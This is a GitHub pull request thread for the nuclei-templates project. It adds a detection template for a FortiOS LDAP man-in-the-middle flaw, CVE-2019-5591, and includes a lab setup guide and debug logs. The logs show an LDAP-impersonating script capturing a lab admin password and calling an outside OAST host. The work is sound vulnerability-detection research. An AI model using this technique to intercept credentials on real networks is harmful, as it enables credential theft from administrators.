Add template for CVE-2019-5591 - FortiOS - Man-in-the-Middle

[ayewo]

Template / PR Information

Prior to using the nuclei command to run the CVE-2019-5591.yaml template included in this PR, you need to first impersonate the LDAP server on the network using a Python script. This is so you can intercept all LDAP credentials from any authentication attempts made by FortiOS on behalf of any (administrative) end user.

The impersonation script will serve as our OOB mechanism so we can reliably detect if a target FortiGate device is running a version of FortiOS that is vulnerable to the MITM attack.

You can use my PoC ldap_honeypot.py for this.
ldap_honeypot.py is started like so:

sudo python3 ldap_honeypot.py

LDAP Honeypot Server started on 0.0.0.0:389
Waiting for connections...

Explanation of the OOB Mechanism

To trigger the vulnerability, the CVE-2019-5591.yaml template generates a random (non-existent) user and uses the interactsh-url as the user's password. These credentials are then sent over HTTP/S to the FortiGate web interface for LDAP authentication, as can be seen in the output from my local testing of the template below.

Once LDAP credentials are received by ldap_honeypot.py, it parses out the LDAP server's admin credentials as well as the end user's password, which is an OAST URL.

The script then makes a simple GET request against the OAST URL, triggering a DNS lookup and a HTTP request.

If those 2 events are received by the nuclei template's interactsh-protocol client, then it is conclusive proof that the target FortiGate device has an LDAP misconfiguration vulnerability.

---

README.md

Instructions on how to download a legal copy of FortiOS v6.2.0 has been sent to [email protected].

1.1. Affected Products

CVE-2019-5591 - FortiOS - Man-in-the-Middle

These versions are vulnerable:

Version	Affected	Solution
FortiOS 7.0	Not affected	Not Applicable
FortiOS 6.0	6.0.3 through 6.2.0	Upgrade to 6.2.1 or above

For the PoC I used FortiOS 6.2.0 in a VM. These instructions were tested on macOS Sequoia 15.6 and should be easy to adapt for any OS.

Note

This document uses the terms "FortiGate" and "FortiOS" interchangeably.

1.2. Obtaining the Affected Products

Fortinet offers free downloads of its products from its Support site once you create a free account with a valid email address (and phone number).

1.2.1. Obtaining FortiGate

Unfortunately, I was unable to see FortiOS 6.2.0 in the "Downloads" -> "VM Images" section of the Fortinet Support site.

They only show a limited selection of their older products for download on the "Earlier Versions" tab as can be seen in this screenshot:

The screenshot lists only these older FortiOS (FortiGate) versions for download:

• 7.6.3
• 7.4.8
• 7.2.12

Notwithstanding, I figured out a way to obtain legal copies of those older versions.

Tip

The step-by-step process is in section 1.2.2. - 1.2.3 which has been emailed privately to [email protected].

1.3. Lab Environment

1.3.1. Network Configuration

At least two network nodes are required (either VMs or physical machines). The nodes must be on the same local subnet and able to communicate with each other.

• One node for the FortiGate (FortiOS VM).
• One node for the LDAP server (Ubuntu Linux).
• One node for the Attacker that will impersonate the LDAP server (macOS).

1.3.2. Scenario

• Node 1 (Victim/Target): A FortiGate firewall running a vulnerable version of FortiOS (6.2.0 or below) configured to use an external LDAP server for authentication.
  • FortiGate config: A minimally configured device with an external LDAP server config lacking the server-identity-check (disabled by default) will easy demo of this vulnerability.
• Node 2 (LDAP Server): An Ubuntu Linux Docker image running slapd as the LDAP server to be used by FortiGate for authentication.
• Node 3 (Attacker): The LDAP server will be impersonated by an Attacker that will execute the Python PoC script (ldap_honeypot.py) that will exfiltrate credentials.

Based on my lab setup, the here's the same info as above but in tabular form:

Node	Role	OS	IP Address
1	Victim/Target	FortiGate (VMware guest OS)	192.168.43.111
2	LDAP Server	Ubuntu Linux (Docker container)	192.168.43.24
3	Attacker (ldap_honeypot.py)	macOS (Host OS)	192.168.43.24

1.3.3. LDAP Server Setup

The LDAP server is a Docker image listening on 192.168.43.24:389 running Ubuntu Linux. It is based on this Ubuntu Linux Docker image by GNS3¹ (because my 3-node lab was originally built using GNS3 but it was too cumbersome for local testing).

Now start the LDAP server with: docker run -it -p 389:389 -p 636:636 --name ldap-server ayewo/ubuntu-ldap-server:1.1

docker run -it -p 389:389 -p 636:636 --name ldap-server ayewo/ubuntu-ldap-server:1.1

...
 * Starting OpenLDAP slapd                                                                                                                                         [ OK ] 
Adding admin user to LDAP using LDAP_ROOT_ADMIN credentials...
adding new entry "cn=fortigate_user,dc=example,dc=com"
...
LDAP Server started successfully!
LDAP Suffix: dc=example,dc=com
LDAP Root Admin DN: cn=admin,dc=example,dc=com
LDAP URI: ldap://localhost:389
...

The LDAP server should now contain the following user accounts:

Username	Password	Role
admin	ldapAdMiNPassw0rd!	LDAP admin
fortigate_user	SuPeRsEcReTpassw0rd	LDAP user

1.3.4. FortiGate Setup

1. After downloading the VMware zip file for FortiOS v6.2.0, extract it then import the file named FortiGate-VM64.hw04.ovf into VMware. This image is configured with 4 network adapters (while FortiGate-VM64.hw07_vmxnet3.ovf is configured to have 10 NICs).

2. Please check the VM settings to ensure that it only has 1 vCPU and 1024 MB of RAM allocated in VMware otherwise it will startup with an invalid license: FGVM00UNLICENSED and more importantly, the invalid license will cause the LDAP authentication feature to be disabled.

3. Next start up the VM, copy its IP address then log into FortiOS over SSH as admin with no password. In my lab, this is simply:

ssh -v [email protected]

4. After you login, the OS will perform some housekeeping like disk formatting etc then reboot. After the reboot, confirm your instance's license is a 15-day trial. You can check your license status with the diagnose debug vm-print-license command.

diagnose debug vm-print-license
VM License Info
Serial number: FGVMEVLJ6KYYEQ6B
License Allowance: 1 CPUs and 1024 MB RAM.
License created: Tue Oct 14 11:36:19 2025
Evaluation license expires: Wed Oct 29 11:36:19 2025

5. If your license says "Expired on 1970/01/01" or you receive the error:

   Admin sessions removed because license registration status changed to 'INVALID'

   the fix is to run:

   exec factoryreset

6. Next set up LDAP server credentials and grant the super_admin user group permission to manage the device remotely via the web interface:

config user ldap
    edit ldap-server
        set server "192.168.43.24"
        set port 389
        set cnid "cn"
        set dn "dc=example,dc=com"
        set type regular
        set username "cn=admin,dc=example,dc=com"
        set password "ldapAdMiNPassw0rd!"
    next
end

config user group
    edit ldap-users
        set member ldap-server
    next
end

config system admin
    edit "ldap-admin"
        set remote-auth enable
        set accprofile "super_admin"
        set vdom "root"
        set wildcard enable
        set remote-group "ldap-users"
    next
end

7. Test that authentication works against the external LDAP server. LDAP testing will be done in 3 - 4 steps:

   1. Enable debug output for 30mins so you can see where things might be going wrong:

   diagnose debug application fnbamd 255
   Debug messages will be on for 30 minutes.

   2. Confirm the LDAP server (at 192.168.43.24) is reachable from FortiOS (192.168.43.111) via execute ping 192.168.43.24:

   execute ping 192.168.43.24
   PING 192.168.43.24 (192.168.43.24): 56 data bytes
   64 bytes from 192.168.43.24: icmp_seq=0 ttl=64 time=1.2 ms
   64 bytes from 192.168.43.24: icmp_seq=1 ttl=64 time=0.9 ms
   64 bytes from 192.168.43.24: icmp_seq=2 ttl=64 time=0.9 ms
   64 bytes from 192.168.43.24: icmp_seq=3 ttl=64 time=0.3 ms
   64 bytes from 192.168.43.24: icmp_seq=4 ttl=64 time=0.3 ms
   
   --- 192.168.43.24 ping statistics ---
   5 packets transmitted, 5 packets received, 0% packet loss
   round-trip min/avg/max = 0.3/0.7/1.2 ms

   3. Test authentication against the external LDAP server as the user fortigate_user with password SuPeRsEcReTpassw0rd:

   diagnose test authserver ldap ldap-server fortigate_user SuPeRsEcReTpassw0rd
   authenticate 'fortigate_user' against 'ldap-server' succeeded!

   4. You should also be able to log in to the FortiOS web interface at http://192.168.43.111 with fortigate_user / SuPeRsEcReTpassw0rd.

1.3.5. Attacker Setup

For the attacker, you can either intercept VLAN traffic meant for the LDAP server at 192.168.43.24:389, or simply terminate the LDAP server and launch ldap_honeypot.py at the same address.

Note that sudo is required to allow us bind on port 389 when starting ldap_honeypot.py:

sudo python3 ldap_honeypot.py

LDAP Honeypot Server started on 0.0.0.0:389
Waiting for connections...

1.3.6. LDAP Misconfiguration Vulnerability

Running the nuclei template should correctly report that FortiOS v6.2.0 is vulnerable to the LDAP MITM attack:

nuclei -t CVE-2019-5591.yaml -target http://192.168.43.111 -debug -vv -svd 

---

• Added CVE-2019-5591
• References:
  • https://github.com/ayewo/fortios-ldap-mitm-poc-CVE-2019-5591
  • https://www.fortiguard.com/psirt/FG-IR-19-037
  • https://www.tenable.com/blog/frequently-asked-questions-about-iranian-cyber-operations
  • https://www.hhs.gov/sites/default/files/iranian-threat-actors-and-healthcare.pdf
  • https://cert-in.org.in/PDF/RANSOMWARE_Report_2022.pdf
  • https://www.ic3.gov/media/news/2021/210527.pdf
  • https://nvd.nist.gov/vuln/detail/CVE-2019-5591

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details (leave it blank if not applicable)

nuclei -t CVE-2019-5591.yaml -target http://192.168.43.111 -vv -debug


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

		projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.3.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 124
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2019-5591] FortiGate - Insecure LDAP Configuration Detection (@ayewo) [medium]
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2019-5591] Dumped HTTP request for http://192.168.43.111/logincheck

POST /logincheck HTTP/1.1
Host: 192.168.43.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 80
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9
Cache-Control: no-store, no-cache, must-revalidate
Connection: keep-alive
Content-Type: text/plain;charset=UTF-8
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Origin: http://192.168.43.111
Pragma: no-cache
Referer: http://192.168.43.111/login

ajax=1&username=RLDETupQGg&secretkey=d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live
[DBG] [CVE-2019-5591] Dumped HTTP response http://192.168.43.111/logincheck

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Security-Policy: frame-ancestors 'self'
Content-Type: text/html; charset=utf-8
Date: Thu, 16 Oct 2025 22:47:06 GMT
Server: 
Set-Cookie: APSCOOKIE_10657718821196653669="Era%3D0%26Payload%3Dmuz81q6ns3coID0hnxxN+vQzuRp0Q4lnup6DHkvE+m%2FVxQXw0GKRWUX4GUa+LZWi%0AUkJg0QWCb+WjlCpXpFGg+Yoh8HwxzEA%2FlsqFy0hHb7cCyojLpAVfXlrHHwIAuiNc%0Aefms6WcWGt13652ottrvusM31lZXQk%2F3he7RgMrfMwCA7kg5kjPJAw%3D%3D%0A%26AuthHash%3DxJ2dsz+4VHMERKWPx9Qbx%2Fsnv4MA%0A"; path=/; HttpOnly; SameSite=Strict
Set-Cookie: ccsrftoken_10657718821196653669="F7E2274126D6763EAB127F4BD93F9E"; path=/; SameSite=Strict
Set-Cookie: ccsrftoken="F7E2274126D6763EAB127F4BD93F9E"; path=/; SameSite=Strict
Strict-Transport-Security: max-age=0
X-Frame-Options: SAMEORIGIN
X-Ua-Compatible: IE=Edge
X-Xss-Protection: 1; mode=block

1document.location="/ng/prompt?viewOnly&redir=%2Fng";
[D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q] Received DNS interaction from 172.253.249.212 at 2025-10-16 22:47:07
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 33599
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q.OasT.LIVe.	IN	 A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 33599
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q.OasT.LIVe.	IN	 A

;; ANSWER SECTION:
D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q.OasT.LIVe.	3600	IN	A	178.128.210.172

;; AUTHORITY SECTION:
D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q.OasT.LIVe.	3600	IN	NS	ns1.oast.live.
D3ONBps2kel6dQ1lpT6G1DAQUC7tFo43Q.OasT.LIVe.	3600	IN	NS	ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.	3600	IN	A	178.128.210.172
ns2.oast.live.	3600	IN	A	178.128.210.172


[CVE-2019-5591:status-1] [http] [medium] http://192.168.43.111/logincheck
[CVE-2019-5591:dsl-2] [http] [medium] http://192.168.43.111/logincheck
[CVE-2019-5591:word-3] [http] [medium] http://192.168.43.111/logincheck
[INF] Scan completed in 11.371260277s. 3 matches found.

Here's the corresponding output for ldap_honeypot.py:

[2025-10-16 23:47:06.540145] New connection from 192.168.43.24:55099

--- Request #1 ---
BIND Request:
  Message ID: 1
  DN: cn=admin,dc=example,dc=com
  Password: ldapAdMiNPassw0rd!
  -> Sent BIND Response (Success)

--- Request #2 ---
SEARCH Request:
  Message ID: 2
  Base DN: dc=example,dc=com
  Filter: 

cn
RLDETupQGg01.1...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #3 ---
BIND Request:
  Message ID: 3
  DN: dc=example,dc=com
  Password: d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live

🔑 CAPTURED PASSWORD: d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live
🔧 No scheme found — prepending https:// -> https://d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live
📡 Attempting GET request to: https://d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live
✅ GET request successful! Status code: 200
  -> Sent BIND Response (Success)

--- Request #4 ---
SEARCH Request:
  Message ID: 4
  Base DN: dc=example,dc=com
  Filter: 


objectclass0memberOfprimaryG...
  -> Sent SEARCH Result Entry
  -> Sent SEARCH Result Done

--- Request #5 ---

[2025-10-16 23:47:08.659098] Connection closed from 192.168.43.24:55099

============================================================
SESSION SUMMARY - Captured Password: d3onbps2kel6dq1lpt6g1daquc7tfo43q.oast.live
============================================================

This is intended as a proper fix for #13436 in order to /claim #13436

Footnotes

1. GNS3 is probably most famous as an open source platform used for learning and teaching amongst network engineers. ↩

[ayewo]

Hey @princechaddha @ritikchaddha @pussycat0x

Would appreciate a look at my PR, thanks.

[ayewo]

Hi @princechaddha @ritikchaddha @pussycat0x @DhiyaneshGeek

This PR has been open for a while now.

Can anyone please take a look?

[ritikchaddha]

Hello @ayewo, thank you for sharing this template with us. Can you confirm if you have tested this template against the actual FortiOS server or the dummy server?

[ayewo]

@ritikchaddha Yes, absolutely.

I've included debug output from my testing against a lab copy of FortiOS 6.2.0 at the end of my PR's description.

[ritikchaddha]

Please share the reference for the setup you used. Also, DM me with the information on Discord. Join our discord server and you can find me.

[ayewo]

@ritikchaddha

Most of the information you need is already present in the PR description above. The info that was omitted was emailed to [email protected] and I've DMed you the exact info on Discord.

If you are still not clear, I've reproduced the step-by-step setup instruction above for you below:

README.md

Instructions on how to download a legal copy of FortiOS v6.2.0 has been sent to [email protected].

1.1. Affected Products

CVE-2019-5591 - FortiOS - Man-in-the-Middle

These versions are vulnerable:

Version	Affected	Solution
FortiOS 7.0	Not affected	Not Applicable
FortiOS 6.0	6.0.3 through 6.2.0	Upgrade to 6.2.1 or above

For the PoC I used FortiOS 6.2.0 in a VM. These instructions were tested on macOS Sequoia 15.6 and should be easy to adapt for any OS.

Note

This document uses the terms "FortiGate" and "FortiOS" interchangeably.

1.2. Obtaining the Affected Products

Fortinet offers free downloads of its products from its Support site once you create a free account with a valid email address (and phone number).

1.2.1. Obtaining FortiGate

Unfortunately, I was unable to see FortiOS 6.2.0 in the "Downloads" -> "VM Images" section of the Fortinet Support site.

They only show a limited selection of their older products for download on the "Earlier Versions" tab as can be seen in this screenshot:

The screenshot lists only these older FortiOS (FortiGate) versions for download:

• 7.6.3
• 7.4.8
• 7.2.12

Notwithstanding, I figured out a way to obtain legal copies of those older versions.

Tip

The step-by-step process is in section 1.2.2. - 1.2.3 which has been emailed privately to [email protected].

1.3. Lab Environment

1.3.1. Network Configuration

At least two network nodes are required (either VMs or physical machines). The nodes must be on the same local subnet and able to communicate with each other.

• One node for the FortiGate (FortiOS VM).
• One node for the LDAP server (Ubuntu Linux).
• One node for the Attacker that will impersonate the LDAP server (macOS).

1.3.2. Scenario

• Node 1 (Victim/Target): A FortiGate firewall running a vulnerable version of FortiOS (6.2.0 or below) configured to use an external LDAP server for authentication.
  • FortiGate config: A minimally configured device with an external LDAP server config lacking the server-identity-check (disabled by default) will easy demo of this vulnerability.
• Node 2 (LDAP Server): An Ubuntu Linux Docker image running slapd as the LDAP server to be used by FortiGate for authentication.
• Node 3 (Attacker): The LDAP server will be impersonated by an Attacker that will execute the Python PoC script (ldap_honeypot.py) that will exfiltrate credentials.

Based on my lab setup, the here's the same info as above but in tabular form:

Node	Role	OS	IP Address
1	Victim/Target	FortiGate (VMware guest OS)	192.168.43.111
2	LDAP Server	Ubuntu Linux (Docker container)	192.168.43.24
3	Attacker (ldap_honeypot.py)	macOS (Host OS)	192.168.43.24

1.3.3. LDAP Server Setup

The LDAP server is a Docker image listening on 192.168.43.24:389 running Ubuntu Linux. It is based on this Ubuntu Linux Docker image by GNS3[^4] (because my 3-node lab was originally built using GNS3 but it was too cumbersome for local testing).

Now start the LDAP server with: docker run -it -p 389:389 -p 636:636 --name ldap-server ayewo/ubuntu-ldap-server:1.1

docker run -it -p 389:389 -p 636:636 --name ldap-server ayewo/ubuntu-ldap-server:1.1

...
 * Starting OpenLDAP slapd                                                                                                                                         [ OK ] 
Adding admin user to LDAP using LDAP_ROOT_ADMIN credentials...
adding new entry "cn=fortigate_user,dc=example,dc=com"
...
LDAP Server started successfully!
LDAP Suffix: dc=example,dc=com
LDAP Root Admin DN: cn=admin,dc=example,dc=com
LDAP URI: ldap://localhost:389
...

The LDAP server should now contain the following user accounts:

Username	Password	Role
admin	ldapAdMiNPassw0rd!	LDAP admin
fortigate_user	SuPeRsEcReTpassw0rd	LDAP user

1.3.4. FortiGate Setup

1. After downloading the VMware zip file for FortiOS v6.2.0, extract it then import the file named FortiGate-VM64.hw04.ovf into VMware. This image is configured with 4 network adapters (while FortiGate-VM64.hw07_vmxnet3.ovf is configured to have 10 NICs).

2. Please check the VM settings to ensure that it only has 1 vCPU and 1024 MB of RAM allocated in VMware otherwise it will startup with an invalid license: FGVM00UNLICENSED and more importantly, the invalid license will cause the LDAP authentication feature to be disabled.

3. Next start up the VM, copy its IP address then log into FortiOS over SSH as admin with no password. In my lab, this is simply:

ssh -v [email protected]

4. After you login, the OS will perform some housekeeping like disk formatting etc then reboot. After the reboot, confirm your instance's license is a 15-day trial. You can check your license status with the diagnose debug vm-print-license command.

diagnose debug vm-print-license
VM License Info
Serial number: FGVMEVLJ6KYYEQ6B
License Allowance: 1 CPUs and 1024 MB RAM.
License created: Tue Oct 14 11:36:19 2025
Evaluation license expires: Wed Oct 29 11:36:19 2025

5. If your license says "Expired on 1970/01/01" or you receive the error:

   Admin sessions removed because license registration status changed to 'INVALID'

   the fix is to run:

   exec factoryreset

6. Next set up LDAP server credentials and grant the super_admin user group permission to manage the device remotely via the web interface:

config user ldap
    edit ldap-server
        set server "192.168.43.24"
        set port 389
        set cnid "cn"
        set dn "dc=example,dc=com"
        set type regular
        set username "cn=admin,dc=example,dc=com"
        set password "ldapAdMiNPassw0rd!"
    next
end

config user group
    edit ldap-users
        set member ldap-server
    next
end

config system admin
    edit "ldap-admin"
        set remote-auth enable
        set accprofile "super_admin"
        set vdom "root"
        set wildcard enable
        set remote-group "ldap-users"
    next
end

7. Test that authentication works against the external LDAP server. LDAP testing will be done in 3 - 4 steps:

   1. Enable debug output for 30mins so you can see where things might be going wrong:

   diagnose debug application fnbamd 255
   Debug messages will be on for 30 minutes.

   2. Confirm the LDAP server (at 192.168.43.24) is reachable from FortiOS (192.168.43.111) via execute ping 192.168.43.24:

   execute ping 192.168.43.24
   PING 192.168.43.24 (192.168.43.24): 56 data bytes
   64 bytes from 192.168.43.24: icmp_seq=0 ttl=64 time=1.2 ms
   64 bytes from 192.168.43.24: icmp_seq=1 ttl=64 time=0.9 ms
   64 bytes from 192.168.43.24: icmp_seq=2 ttl=64 time=0.9 ms
   64 bytes from 192.168.43.24: icmp_seq=3 ttl=64 time=0.3 ms
   64 bytes from 192.168.43.24: icmp_seq=4 ttl=64 time=0.3 ms
   
   --- 192.168.43.24 ping statistics ---
   5 packets transmitted, 5 packets received, 0% packet loss
   round-trip min/avg/max = 0.3/0.7/1.2 ms

   3. Test authentication against the external LDAP server as the user fortigate_user with password SuPeRsEcReTpassw0rd:

   diagnose test authserver ldap ldap-server fortigate_user SuPeRsEcReTpassw0rd
   authenticate 'fortigate_user' against 'ldap-server' succeeded!

   4. You should also be able to log in to the FortiOS web interface at http://192.168.43.111 with fortigate_user / SuPeRsEcReTpassw0rd.

1.3.5. Attacker Setup

For the attacker, you can either intercept VLAN traffic meant for the LDAP server at 192.168.43.24:389, or simply terminate the LDAP server and launch ldap_honeypot.py at the same address.

Note that sudo is required to allow us bind on port 389 when starting ldap_honeypot.py:

sudo python3 ldap_honeypot.py

LDAP Honeypot Server started on 0.0.0.0:389
Waiting for connections...

1.3.6. LDAP Misconfiguration Vulnerability

Running the nuclei template should correctly report that FortiOS v6.2.0 is vulnerable to the LDAP MITM attack:

nuclei -t CVE-2019-5591.yaml -target http://192.168.43.111 -debug -vv -svd